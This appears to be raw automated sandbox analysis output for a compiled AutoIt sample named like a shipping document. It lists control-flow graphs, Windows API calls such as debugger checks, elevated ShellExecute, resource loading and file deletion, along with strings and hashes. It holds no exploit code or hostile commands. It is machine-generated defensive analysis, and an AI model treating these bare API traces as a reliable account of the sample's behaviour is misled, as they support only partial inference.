98677->98679 98681 e3ed97 GetOpenFileNameW 98678->98681 98826 

                    Control-flow Graph

                    APIs
                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E03B7A
                    • IsDebuggerPresent.KERNEL32 ref: 00E03B8C
                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,00EC52F8,00EC52E0,?,?), ref: 00E03BFD
                      • Part of subcall function 00E07D2C: _memmove.LIBCMT ref: 00E07D66
                      • Part of subcall function 00E10A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00E03C26,00EC52F8,?,?,?), ref: 00E10ACE
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00E03C81
                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00EB7770,00000010), ref: 00E3D3EC
                    • SetCurrentDirectoryW.KERNEL32(?,00EC52F8,?,?,?), ref: 00E3D424
                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00EB4260,00EC52F8,?,?,?), ref: 00E3D4AA
                    • ShellExecuteW.SHELL32(00000000,?,?), ref: 00E3D4B1
                      • Part of subcall function 00E03A58: GetSysColorBrush.USER32(0000000F), ref: 00E03A62
                      • Part of subcall function 00E03A58: LoadCursorW.USER32(00000000,00007F00), ref: 00E03A71
                      • Part of subcall function 00E03A58: LoadIconW.USER32(00000063), ref: 00E03A88
                      • Part of subcall function 00E03A58: LoadIconW.USER32(000000A4), ref: 00E03A9A
                      • Part of subcall function 00E03A58: LoadIconW.USER32(000000A2), ref: 00E03AAC
                      • Part of subcall function 00E03A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E03AD2
                      • Part of subcall function 00E03A58: RegisterClassExW.USER32(?), ref: 00E03B28
                      • Part of subcall function 00E039E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E03A15
                      • Part of subcall function 00E039E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E03A36
                      • Part of subcall function 00E039E7: ShowWindow.USER32(00000000,?,?), ref: 00E03A4A
                      • Part of subcall function 00E039E7: ShowWindow.USER32(00000000,?,?), ref: 00E03A53
                      • Part of subcall function 00E043DB: _memset.LIBCMT ref: 00E04401
                      • Part of subcall function 00E043DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E044A6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                    • String ID: This is a third-party compiled AutoIt script.$runas$%
                    • API String ID: 529118366-3343222573
                    • Opcode ID: dd3494cc8ce0dd652cace3de8f443e7acd0ac3b66bf4c88727138734b13fe567
                    • Instruction ID: 393b0cacefa01537e1b20f31e986dba114673069372bd8ae15e2b71837700a76
                    • Opcode Fuzzy Hash: dd3494cc8ce0dd652cace3de8f443e7acd0ac3b66bf4c88727138734b13fe567
                    • Instruction Fuzzy Hash: 28511971D08248AEDF15EBB5EC45EEEBBF8AB44304F106169F451B21F1CA7166CACB21

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 983 e04fe9-e05001 CreateStreamOnHGlobal 984 e05021-e05026 983->984 985 e05003-e0501a FindResourceExW 983->985 986 e05020 985->986 987 e3dc8c-e3dc9b LoadResource 985->987 986->984 987->986 988 e3dca1-e3dcaf SizeofResource 987->988 988->986 989 e3dcb5-e3dcc0 LockResource 988->989 989->986 990 e3dcc6-e3dcce 989->990 991 e3dcd2-e3dce4 990->991 991->986
                    APIs
                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00E04EEE,?,?,00000000,00000000), ref: 00E04FF9
                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00E04EEE,?,?,00000000,00000000), ref: 00E05010
                    • LoadResource.KERNEL32(?,00000000,?,?,00E04EEE,?,?,00000000,00000000,?,?,?,?,?,?,00E04F8F), ref: 00E3DC90
                    • SizeofResource.KERNEL32(?,00000000,?,?,00E04EEE,?,?,00000000,00000000,?,?,?,?,?,?,00E04F8F), ref: 00E3DCA5
                    • LockResource.KERNEL32(N,?,?,00E04EEE,?,?,00000000,00000000,?,?,?,?,?,?,00E04F8F,00000000), ref: 00E3DCB8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                    • String ID: SCRIPT$N
                    • API String ID: 3051347437-3852340653
                    • Opcode ID: 23d0d4d9fc85d007a88e5c5c9163b3530f5c752052f73dbc4a2e84fc40840b1d
                    • Instruction ID: 37680bc750811cbca45c18ae6e35880ae1d7a6d151d6527597419e499efebe6a
                    • Opcode Fuzzy Hash: 23d0d4d9fc85d007a88e5c5c9163b3530f5c752052f73dbc4a2e84fc40840b1d
                    • Instruction Fuzzy Hash: A5115A75200700AFD7258B66DC48F6B7BB9EBC9B11F204568F40AE62A0DB61EC44CA60

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1047 e04afe-e04b5e call e077c7 GetVersionExW call e07d2c 1052 e04b64 1047->1052 1053 e04c69-e04c6b 1047->1053 1054 e04b67-e04b6c 1052->1054 1055 e3dac0-e3dacc 1053->1055 1057 e04c70-e04c71 1054->1057 1058 e04b72 1054->1058 1056 e3dacd-e3dad1 1055->1056 1060 e3dad3 1056->1060 1061 e3dad4-e3dae0 1056->1061 1059 e04b73-e04baa call e07e8c call e07886 1057->1059 1058->1059 1069 e04bb0-e04bb1 1059->1069 1070 e3dbbd-e3dbc0 1059->1070 1060->1061 1061->1056 1063 e3dae2-e3dae7 1061->1063 1063->1054 1065 e3daed-e3daf4 1063->1065 1065->1055 1067 e3daf6 1065->1067 1071 e3dafb-e3dafe 1067->1071 1069->1071 1072 e04bb7-e04bc2 1069->1072 1073 e3dbc2 1070->1073 1074 e3dbd9-e3dbdd 1070->1074 1075 e04bf1-e04c08 GetCurrentProcess IsWow64Process 1071->1075 1076 e3db04-e3db22 1071->1076 1081 e3db43-e3db49 1072->1081 1082 e04bc8-e04bca 1072->1082 1083 e3dbc5 1073->1083 1077 e3dbc8-e3dbd1 1074->1077 1078 e3dbdf-e3dbe8 1074->1078 1079 e04c0a 1075->1079 1080 e04c0d-e04c1e 1075->1080 1076->1075 1084 e3db28-e3db2e 1076->1084 1077->1074 1078->1083 1087 e3dbea-e3dbed 1078->1087 1079->1080 1088 e04c20-e04c30 call e04c95 1080->1088 1089 e04c89-e04c93 GetSystemInfo 1080->1089 1085 e3db53-e3db59 1081->1085 1086 e3db4b-e3db4e 1081->1086 1090 e04bd0-e04bd3 1082->1090 1091 e3db5e-e3db6a 1082->1091 1083->1077 1092 e3db30-e3db33 1084->1092 1093 e3db38-e3db3e 1084->1093 1085->1075 1086->1075 1087->1077 1104 e04c32-e04c3f call e04c95 1088->1104 1105 e04c7d-e04c87 GetSystemInfo 1088->1105 1094 e04c56-e04c66 1089->1094 1098 e3db8a-e3db8d 1090->1098 1099 e04bd9-e04be8 1090->1099 1095 e3db74-e3db7a 1091->1095 1096 e3db6c-e3db6f 1091->1096 1092->1075 1093->1075 1095->1075 1096->1075 1098->1075 1103 e3db93-e3dba8 1098->1103 1100 e3db7f-e3db85 1099->1100 1101 e04bee 1099->1101 1100->1075 1101->1075 1106 e3dbb2-e3dbb8 1103->1106 1107 e3dbaa-e3dbad 1103->1107 1112 e04c41-e04c45 GetNativeSystemInfo 1104->1112 1113 e04c76-e04c7b 1104->1113 1108 e04c47-e04c4b 1105->1108 
1106->1075 1107->1075 1108->1094 1111 e04c4d-e04c50 FreeLibrary 1108->1111 1111->1094 1112->1108 1113->1112
                    APIs
                    • GetVersionExW.KERNEL32(?), ref: 00E04B2B
                      • Part of subcall function 00E07D2C: _memmove.LIBCMT ref: 00E07D66
                    • GetCurrentProcess.KERNEL32(?,00E8FAEC,00000000,00000000,?), ref: 00E04BF8
                    • IsWow64Process.KERNEL32(00000000), ref: 00E04BFF
                    • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00E04C45
                    • FreeLibrary.KERNEL32(00000000), ref: 00E04C50
                    • GetSystemInfo.KERNEL32(00000000), ref: 00E04C81
                    • GetSystemInfo.KERNEL32(00000000), ref: 00E04C8D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                    • String ID:
                    • API String ID: 1986165174-0
                    • Opcode ID: f49afeaad7d175afd1a6e5c05d8c88c5929cc3f5a27bb245790673cbf3188d96
                    • Instruction ID: 2864b5a9e28365207ae8fd6a0228bdf970a204c081c7cf07b7c03cebc509b687
                    • Opcode Fuzzy Hash: f49afeaad7d175afd1a6e5c05d8c88c5929cc3f5a27bb245790673cbf3188d96
                    • Instruction Fuzzy Hash: 0691F6B154E7C0DED731CB6895951AAFFE4AF25300F48599DD1CBB3A81D230E988C729
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: BuffCharUpper
                    • String ID: pb$%
                    • API String ID: 3964851224-1798441486
                    • Opcode ID: 4f724afcca5220d3afc925e33e8d73b3f6c4f7f16d9f343d3cfdd1e4e509ce3e
                    • Instruction ID: 59f31e2439a7c3f6767496bf74f37e681c4c1b336492d951d3677e14983d1c29
                    • Opcode Fuzzy Hash: 4f724afcca5220d3afc925e33e8d73b3f6c4f7f16d9f343d3cfdd1e4e509ce3e
                    • Instruction Fuzzy Hash: 259270706083419FD724DF14C480BAAB7E1BF84304F14A96DF89AAB392D775EC85CB92
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID:
                    • String ID: Dd$Dd$Dd$Dd$Variable must be of type 'Object'.
                    • API String ID: 0-2781164977
                    • Opcode ID: 7583e6378d9a53641f4abdd0229823f277951020b7fc869771082ecd0988eb1e
                    • Instruction ID: 8b0f2b20da40aa7462a5aa749247bb1db5d9a7ebc2b13bb39e4762beb23dae42
                    • Opcode Fuzzy Hash: 7583e6378d9a53641f4abdd0229823f277951020b7fc869771082ecd0988eb1e
                    • Instruction Fuzzy Hash: B5A28C75A00205CFCB24CF58C481AAEB7B1FF58314F649869E956BB392D731ED86CB90
                    APIs
                    • GetFileAttributesW.KERNELBASE(?,00E3E6F1), ref: 00E644AB
                    • FindFirstFileW.KERNELBASE(?,?), ref: 00E644BC
                    • FindClose.KERNEL32(00000000), ref: 00E644CC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: FileFind$AttributesCloseFirst
                    • String ID:
                    • API String ID: 48322524-0
                    • Opcode ID: 7fcbc5f754eb5cc986599f4f64a450cbb87c6a02824a56bf0b52694421190e51
                    • Instruction ID: ed8bb8285afab4ee2f07e502e92cd44b9ede8366a923c2e2b8becf2dcc89580a
                    • Opcode Fuzzy Hash: 7fcbc5f754eb5cc986599f4f64a450cbb87c6a02824a56bf0b52694421190e51
                    • Instruction Fuzzy Hash: 03E0DF728108006B8210A738FC0E8EA779CAF453B9F100726F939E20E0EB7499148696
                    APIs
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E10BBB
                    • timeGetTime.WINMM ref: 00E10E76
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E10FB3
                    • Sleep.KERNEL32(0000000A), ref: 00E10FC1
                    • LockWindowUpdate.USER32(00000000,?,?), ref: 00E1105A
                    • DestroyWindow.USER32 ref: 00E11066
                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E11080
                    • Sleep.KERNEL32(0000000A,?,?), ref: 00E451DC
                    • TranslateMessage.USER32(?), ref: 00E45FB9
                    • DispatchMessageW.USER32(?), ref: 00E45FC7
                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E45FDB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                    • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pb$pb$pb$pb
                    • API String ID: 4212290369-1420604165
                    • Opcode ID: 33714c22a13f93ca36db3004564f4c8119f0bba312e38c5c9897648deae4f2c7
                    • Instruction ID: b793ba53541194a10a9a8e78e3446596f5c1bbbf49e1c4e8fa31ed9e792f8529
                    • Opcode Fuzzy Hash: 33714c22a13f93ca36db3004564f4c8119f0bba312e38c5c9897648deae4f2c7
                    • Instruction Fuzzy Hash: 7CB2D271608741DFD728DF24D884BAAB7E5BF84304F14591DF49AB72A2CB71E885CB82

                    Control-flow Graph

                    APIs
                      • Part of subcall function 00E69008: __time64.LIBCMT ref: 00E69012
                      • Part of subcall function 00E05045: _fseek.LIBCMT ref: 00E0505D
                    • __wsplitpath.LIBCMT ref: 00E692DD
                      • Part of subcall function 00E2426E: __wsplitpath_helper.LIBCMT ref: 00E242AE
                    • _wcscpy.LIBCMT ref: 00E692F0
                    • _wcscat.LIBCMT ref: 00E69303
                    • __wsplitpath.LIBCMT ref: 00E69328
                    • _wcscat.LIBCMT ref: 00E6933E
                    • _wcscat.LIBCMT ref: 00E69351
                      • Part of subcall function 00E6904E: _memmove.LIBCMT ref: 00E69087
                      • Part of subcall function 00E6904E: _memmove.LIBCMT ref: 00E69096
                    • _wcscmp.LIBCMT ref: 00E69298
                      • Part of subcall function 00E697DD: _wcscmp.LIBCMT ref: 00E698CD
                      • Part of subcall function 00E697DD: _wcscmp.LIBCMT ref: 00E698E0
                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00E694FB
                    • _wcsncpy.LIBCMT ref: 00E6956E
                    • DeleteFileW.KERNEL32(?,?), ref: 00E695A4
                    • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00E695BA
                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E695CB
                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E695DD
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                    • String ID:
                    • API String ID: 1500180987-0
                    • Opcode ID: 790f33e24c5688a2f6b63f96dd433d12afef7062fd7a956b0ed4d10e5895caeb
                    • Instruction ID: 72993518110b18bfdc3f901ada93bc0462a6af7b065bba0b4c179a02a50017d9
                    • Opcode Fuzzy Hash: 790f33e24c5688a2f6b63f96dd433d12afef7062fd7a956b0ed4d10e5895caeb
                    • Instruction Fuzzy Hash: 21C16CB2D40229AACF21DF95DC85ADEB7BDEF44350F0050AAF609F7151DB309A848F65

                    Control-flow Graph

                    APIs
                    • GetSysColorBrush.USER32(0000000F), ref: 00E03074
                    • RegisterClassExW.USER32(00000030), ref: 00E0309E
                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E030AF
                    • InitCommonControlsEx.COMCTL32(?), ref: 00E030CC
                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E030DC
                    • LoadIconW.USER32(000000A9), ref: 00E030F2
                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E03101
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                    • API String ID: 2914291525-1005189915
                    • Opcode ID: 9099d890c772a24efbe56af2908133905eee6c4fca0020ece348239c866e4b96
                    • Instruction ID: f9860b686652d4b566f844ce2ee3f702e20755dbc148f014f3152c2710571ba4
                    • Opcode Fuzzy Hash: 9099d890c772a24efbe56af2908133905eee6c4fca0020ece348239c866e4b96
                    • Instruction Fuzzy Hash: E33128B2851309AFDB408FA5E884ACDBBF4FB08310F10412AE554F62A0D7B6158ACF50

                    Control-flow Graph

                    APIs
                    • GetSysColorBrush.USER32(0000000F), ref: 00E03074
                    • RegisterClassExW.USER32(00000030), ref: 00E0309E
                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E030AF
                    • InitCommonControlsEx.COMCTL32(?), ref: 00E030CC
                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E030DC
                    • LoadIconW.USER32(000000A9), ref: 00E030F2
                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E03101
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                    • API String ID: 2914291525-1005189915
                    • Opcode ID: a4a7dd29229ba6af95f4c73a987a004b39f39684df8fab6403146250970e78c6
                    • Instruction ID: 332379660f03ebb88da2d8e1a8173bc027910bc3f0f738bd0383d308bed45fac
                    • Opcode Fuzzy Hash: a4a7dd29229ba6af95f4c73a987a004b39f39684df8fab6403146250970e78c6
                    • Instruction Fuzzy Hash: 1721F7B2911308AFEB00DFA6EC49B9DBBF4FB08700F10412AF515B62A0D7B255898F91

                    Control-flow Graph

                    APIs
                      • Part of subcall function 00E04864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00EC52F8,?,00E037C0,?), ref: 00E04882
                      • Part of subcall function 00E2068B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00E072C5), ref: 00E206AD
                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00E07308
                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00E3EC21
                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00E3EC62
                    • RegCloseKey.ADVAPI32(?), ref: 00E3ECA0
                    • _wcscat.LIBCMT ref: 00E3ECF9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                    • API String ID: 2673923337-2727554177
                    • Opcode ID: 8e779ac78102485bbccb37ad1dc6b0f5720e4722f9c19e070d6fe61478915450
                    • Instruction ID: ac54f536d3f2b86b46e8d01b34329f994486b64c0f4cee026fa0012db3d7d3b4
                    • Opcode Fuzzy Hash: 8e779ac78102485bbccb37ad1dc6b0f5720e4722f9c19e070d6fe61478915450
                    • Instruction Fuzzy Hash: EC715C715093019ED708EF26E845D9BBBE8FF88340F40692EF445B72B1DB729989CB51

                    Control-flow Graph

                    APIs
                    • DefWindowProcW.USER32(?,?,?,?), ref: 00E036D2
                    • KillTimer.USER32(?,00000001), ref: 00E036FC
                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E0371F
                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E0372A
                    • CreatePopupMenu.USER32 ref: 00E0373E
                    • PostQuitMessage.USER32(00000000), ref: 00E0375F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                    • String ID: TaskbarCreated$%
                    • API String ID: 129472671-3835587964
                    • Opcode ID: 417bea75c48fb2625bcdf76170970ab0df87d5029cc79e1b3e5cd68c47ae0aaf
                    • Instruction ID: d18264378a9d8a23cb2edd09913742f7d9859e35a9a263f25dd21c9ba6cdcf51
                    • Opcode Fuzzy Hash: 417bea75c48fb2625bcdf76170970ab0df87d5029cc79e1b3e5cd68c47ae0aaf
                    • Instruction Fuzzy Hash: 954109B3214505AFDB189B78FD09FBA369CE740300F14213AF601B62E2CA63A9D59361

                    Control-flow Graph

                    APIs
                    • GetSysColorBrush.USER32(0000000F), ref: 00E03A62
                    • LoadCursorW.USER32(00000000,00007F00), ref: 00E03A71
                    • LoadIconW.USER32(00000063), ref: 00E03A88
                    • LoadIconW.USER32(000000A4), ref: 00E03A9A
                    • LoadIconW.USER32(000000A2), ref: 00E03AAC
                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E03AD2
                    • RegisterClassExW.USER32(?), ref: 00E03B28
                      • Part of subcall function 00E03041: GetSysColorBrush.USER32(0000000F), ref: 00E03074
                      • Part of subcall function 00E03041: RegisterClassExW.USER32(00000030), ref: 00E0309E
